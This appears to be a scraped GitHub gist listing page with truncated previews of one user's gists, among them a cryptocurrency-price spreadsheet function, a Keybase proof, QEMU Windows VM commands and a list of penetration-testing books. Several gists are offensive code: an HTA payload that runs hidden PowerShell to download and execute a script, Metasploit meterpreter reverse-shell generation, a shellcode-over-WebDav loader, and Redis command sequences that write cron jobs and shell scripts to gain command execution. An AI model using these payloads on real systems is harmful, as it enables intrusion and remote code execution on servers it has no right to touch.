View gist:cd5d5c714fd69691d80650887c3d5d75
//returns price (or other info) of cryptocurrency from coinmarketcap api.
//takes two parameters, the name of the cryptocurrency and info that you want returned about the cc
//example: =ccprice("ethereum", "USD")
//example2 =ccprice("ethereum", "24h_volume_usd")
function ccprice(name, currency)

Keybase proof

I hereby claim:

  • I am carnal0wnage on github.
  • I am carnal0wnage ( on keybase.
  • I have a public key ASBAbr1taoZoDoZ5mQsko2BW675dxHpNRP-cenmfGfO03Qo

To claim this, I am signing this object:

View Invoke-WebDavDelivery.ps1
function Invoke-WebDavDelivery
Receive a shellcode over WebDav PROPFIND channel, then load it into memory and execute it.
This script requires its server side counterpart ( to communicate with and actually deliver the payload data.
Function: Invoke-WebDavDelivery
Author: Arno0x0x, Twitter: @Arno0x0x
View gist:606c41ac6ec40bf5c69d4db96d9312e3
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
Social Engineering: The Art of Human Hacking by Christopher Hadnagy
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors
# Installing
qemu-system-x86_64 -bios /usr/share/ovmf/ovmf_x64.bin -enable-kvm -cpu host -smp 4 -m 2048 -cdrom ~/Downloads/Win10_English_x64.iso -net nic,model=virtio -net user -drive file=~/vm/win10.hd.img.raw,format=raw,if=virtio -vga qxl -drive file=~/Downloads/virtio-win-0.1.105.iso,index=1,media=cdrom
# Running
qemu-system-x86_64 -bios /usr/share/ovmf/ovmf_x64.bin -enable-kvm -cpu host -smp 4 -m 4096 -net nic,model=virtio -net user -drive file=~/vm/win10.hd.img.raw,format=raw,if=virtio -vga qxl -usbdevice tablet -rtc base=utc
View DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links
View gist:93a9a8fa20acd0d62d0343b438710db8 cat hta-psh.txt
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('')"</scRipt>
# cat hta-psh.txt |redis-cli -x -h set a
use payload/windows/meterpreter/reverse_tcp
generate -t hta-psh -f /var/www/1.ps1
#cat 1.ps1
View gist:b5e8ae7a489207c58f54cfaa7b37718d
echo " " > /tmp/zz
cat /tmp/w >> /tmp/zz
/bin/sh /tmp/zz
redis-cli get r
* * * * * sleep 10;/bin/sh /tmp/zz
View gist:5a9578a66484435b9685e03a27c9d3fc
redis-cli flushall
redis-cli set 2 ';a=`redis-cli get c`;'
redis-cli set 1 'id;redis-cli set r `$a`;#'
redis-cli config set dir /tmp/
redis-cli config set dbfilename w
redis-cli save
redis-cli set c whoami
View gist:01963c7a36235e90c11ef8756e76d3d5
redis-cli flushall # 为了方便测试
redis-cli set test 'test'
redis-cli set my 'mymymymymymymymymymymymy'
redis-cli set word 'wordwordwordwordwordword'
redis-cli set hello 'ringzero'
redis-cli set word1 'word1word1word1word1word1word1'
echo -e "\n\n*/1 * * * * /bin/touch /tmp/888\n\n"|redis-cli -x set 1
redis-cli config set dir /var/spool/cron/
redis-cli config set dbfilename root
redis-cli save